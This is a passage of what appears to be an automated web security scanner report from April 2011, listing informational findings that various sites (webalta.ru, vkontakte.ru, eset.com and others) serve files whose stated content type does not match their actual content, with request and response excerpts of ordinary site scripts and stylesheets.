GET /public/engine/page.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:30:07 GMT
Content-Type: application/x-javascript
Content-Length: 28424
Last-Modified: Tue, 23 Dec 2008 15:25:56 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:30:07 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function $(e_id)
{
return document.getElementById(e_id);
}

function create_El(s_div,s_parent,s_id,s_width,s_height,s_top,s_left,s_visibility,s_class,s_html)
{//................ .........
...[SNIP]...

33.41. http://my.webalta.ru/public/engine/reader.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/reader.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/reader.js?version=1.1 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:29:23 GMT
Content-Type: application/x-javascript
Content-Length: 15804
Last-Modified: Tue, 09 Dec 2008 14:52:13 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:29:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __reader = new rssReader();

// ............ ...................... ...... ............. .......... ........................ ...... ............ ...........
var __parser = new Object();

_
...[SNIP]...

33.42. http://my.webalta.ru/public/engine/settings.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/settings.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

33.43. http://my.webalta.ru/public/engine/skinpacks.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/skinpacks.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/skinpacks.js?version=1.0 HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:46 GMT
Content-Type: application/x-javascript
Content-Length: 2349
Last-Modified: Mon, 24 Nov 2008 13:34:42 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:26:46 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...var __skinpack = new skinPacks();
//__skinpack.apply();

function skinPacks()
{
   this.theme_color = '#52677A';

   this.bg_top_color = '#fff';
   this.bg_top_img = '/public/visual/theme/top/top
...[SNIP]...

33.44. http://my.webalta.ru/public/engine/templates.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/templates.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

33.45. http://my.webalta.ru/public/engine/widget/browse/widget_script.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/widget/browse/widget_script.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/browse/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:33 GMT
Content-Type: application/x-javascript
Content-Length: 2882
Last-Modified: Mon, 22 Dec 2008 08:59:36 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:33 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function browse_fNewBlock_2()
{
       // .............. ..........
   function _options()
   {
       return '';
       var id = this.d.b_index;
       var html = '';

           html += '<div id="' + id + '_options" s
...[SNIP]...

33.46. http://my.webalta.ru/public/engine/widget/flash/widget_script.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/widget/flash/widget_script.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/flash/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 5003
Last-Modified: Wed, 12 Nov 2008 09:08:18 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function flash_f_new_block_2(id_block)
{

   // ID ..............
   this.d._id = id_block;

   // ..........................
   function init()
   {
       var el = document.getElementById(this.name_bl
...[SNIP]...

33.47. http://my.webalta.ru/public/engine/widget/gameboss/widget_script.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/widget/gameboss/widget_script.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/gameboss/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:32:23 GMT
Content-Type: application/x-javascript
Content-Length: 6277
Last-Modified: Fri, 21 Nov 2008 06:52:06 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:32:23 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function gameboss_fNewBlock_2()
{
   function fLdrReceive(txt)
       {

           txt=txt.replace(/<\?xml.*?>/g, " ");
           txt=txt.replace(/<img.*?>/g, " ");
           txt=txt.replace(/<.*?>/g, " ");

...[SNIP]...

33.48. http://my.webalta.ru/public/engine/widget/labpixies/widget_script.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/engine/widget/labpixies/widget_script.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/engine/widget/labpixies/widget_script.js HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.4.10.1303741218; WEB_CH_C=webalta_cookies

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:31:57 GMT
Content-Type: application/x-javascript
Content-Length: 2358
Last-Modified: Mon, 24 Nov 2008 13:40:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:31:57 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

...function labpixies_fNewBlock_2()
{
   function fLdrReceive(txt)
       {
           function substring(at, to, str)
       {
               start_pos = str.indexOf(at) + at.length;
               pars = str.substr(start_pos);

...[SNIP]...

33.49. http://my.webalta.ru/public/visual/index.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/visual/index.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/index.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:00 GMT
Content-Type: text/css
Content-Length: 9788
Last-Modified: Wed, 12 Nov 2008 09:09:11 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:00 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ......... ......
   ...... .... .. ......... .. index.html
   ......... ..........: 08.11.08
   ...., .........., .. ..... .... .... ... .....

*/

body { min-width: 600px; padding: 0px; margi
...[SNIP]...

33.50. http://my.webalta.ru/public/visual/theme.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/visual/theme.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/visual/theme.css HTTP/1.1
Host: my.webalta.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.3.10.1303741218

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:25:12 GMT
Content-Type: text/css
Content-Length: 2449
Last-Modified: Tue, 18 Nov 2008 16:11:07 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Mon, 16 May 2011 14:25:12 GMT
Cache-Control: max-age=1814400
Accept-Ranges: bytes

/*
   ............ ......
   ..... ........ . ........... .. ...., .. .. ......... ............ ...
   ......... ..........: 09.11.08
   ...., .........., .. ..... .... .... ... .....

*/

/* .... ..
...[SNIP]...

33.51. http://my.webalta.ru/public/visual/themes/css.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://my.webalta.ru
Path:	/public/visual/themes/css.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

33.52. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

Response

33.53. http://pogoda.webalta.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pogoda.webalta.ru
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "da2ac4-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.54. http://pogoda.webalta.ru/public/css/style-weather.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pogoda.webalta.ru
Path:	/public/css/style-weather.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-weather.css?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:22:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Mar 2011 18:53:44 GMT
ETag: "8680f0-1c05-49e397b315e00"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.55. http://pogoda.webalta.ru/public/js/search.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://pogoda.webalta.ru
Path:	/public/js/search.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/search.js?v1 HTTP/1.1
Host: pogoda.webalta.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; pogoda_reg=10290

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:21:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 15 Mar 2011 16:38:58 GMT
ETag: "8680d8-1c05-49e8810984c80"
Accept-Ranges: bytes
Content-Length: 7173
Connection: close
Content-Type: application/x-javascript

var my_sender = new sack("/zajax_search.php");
var city_sender = new sack("/zajax_set.php");

var seachBgOn = "#afdfff";
var seachBgOff = "#f2f6ff";

var search_sending = false;
var positioned
...[SNIP]...

33.56. http://smiimg.dt00.net/smi/2011/04/20110414khlopin-75x75.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://smiimg.dt00.net
Path:	/smi/2011/04/20110414khlopin-75x75.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /smi/2011/04/20110414khlopin-75x75.jpg HTTP/1.1
Host: smiimg.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:23 GMT
Content-Type: image/jpeg
Content-Length: 5395
Last-Modified: Thu, 14 Apr 2011 07:52:39 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:21:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

GIF87aK.K.....
*T_....._R...*8\.......vsY:RL.8.xl|HV$#K...._P4JtULk.HA....QG.ao....kj<8_.l_..t.xm$.A.OC@$@...sK[.SL.m].xy|x..B=....mo..y$-CCj|:@.`T$0WTW|.l_ro....,Bjq9C|Rd....UJ....y|.aj....lnd(4....
...[SNIP]...

33.57. http://tengrinews.kz/static/js/remainNY.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tengrinews.kz
Path:	/static/js/remainNY.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /static/js/remainNY.js HTTP/1.1
Host: tengrinews.kz
Proxy-Connection: keep-alive
Referer: http://tengrinews.kz/tag/891/?_openstat=ZGlyZWN0LnlhbmRleC5ydTsxOTgyMjk5OzczMDAyNTU7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2s711rqep5c965kp1duse9cev3; sess=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229d0d0366c112938578e0493b8d3e9f0f%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221303741246%22%3B%7Dff90da2a04be034fcd1d0a9e7c69a191

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 14:36:39 GMT
Content-Type: application/javascript
Connection: keep-alive
Last-Modified: Fri, 21 Jan 2011 05:16:16 GMT
ETag: "be139-6c8-49a54597ae800"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1736

function newYearIn()
{
var days=" ........ "
var now = new Date();
var newYear = new Date("Jan,30,2011,00:00:00");
var totalRemains = (newYear.getTime()-now.getTime());
if (t
...[SNIP]...

33.58. http://translate.googleapis.com/translate_a/t previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://translate.googleapis.com
Path:	/translate_a/t

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

33.59. http://vkontakte.ru/js/lang0_0.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://vkontakte.ru
Path:	/js/lang0_0.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=windows-1251

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/lang0_0.js?3340 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:41 GMT
Content-Type: text/javascript; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny4
Cache-Control: max-age=604800
Vary: Accept-Encoding
Expires: Mon, 02 May 2011 14:23:41 GMT
Content-Length: 52089

try{stManager.done('lang0_0.js');}catch(e){}
Aboutme='. ....:';
Acad_status='......:';
Acad_status_bach='....... (........)';
Acad_status_bach_fm='......... (........)';
Acad_status_ent='..........';

...[SNIP]...

33.60. http://www.eset.com/us/scripts/business.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/business.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/business.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:52:46 GMT
X-Varnish: 1310965301
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 2557

var ESET_Business = {
init: function() {
// check for product dropdowns
if($('business_dropdown_eav')) {
this.setProductDropdown('eav');
}
if($('business_dropdown_eavmac'
...[SNIP]...

33.61. http://www.eset.com/us/scripts/common.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/common.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /us/scripts/common.js HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738202515%3B%20gpv_pageName%3Dus/store%7C1303738202519%3B%20s_nr%3D1303736402523-Repeat%7C1335272402523%3B%20s_invisit%3Dtrue%7C1303738202525%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/store%252526pidt%25253D1%252526oid%25253Dfunctiononclick%25252528event%25252529%2525257BaddMboxValue%25252528%25252527ns_form_1%25252527%25252529%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DIMAGE%3B; mbox=PC#1303736347554-914602.17#1304952755|check#true#1303743215|session#1303743154006-383984#1303745015

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 14:52:23 GMT
X-Varnish: 555585940
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 934

var Common = {};

Common.Ticker = new Class({
Implements: Options,
options: {
items: [],
link_id: 'ticker-link',
duration: 4000
},

initialize: function(id, options) {

...[SNIP]...

33.62. http://www.eset.com/us/scripts/elqNow/elqCfg.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.eset.com
Path:	/us/scripts/elqNow/elqCfg.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

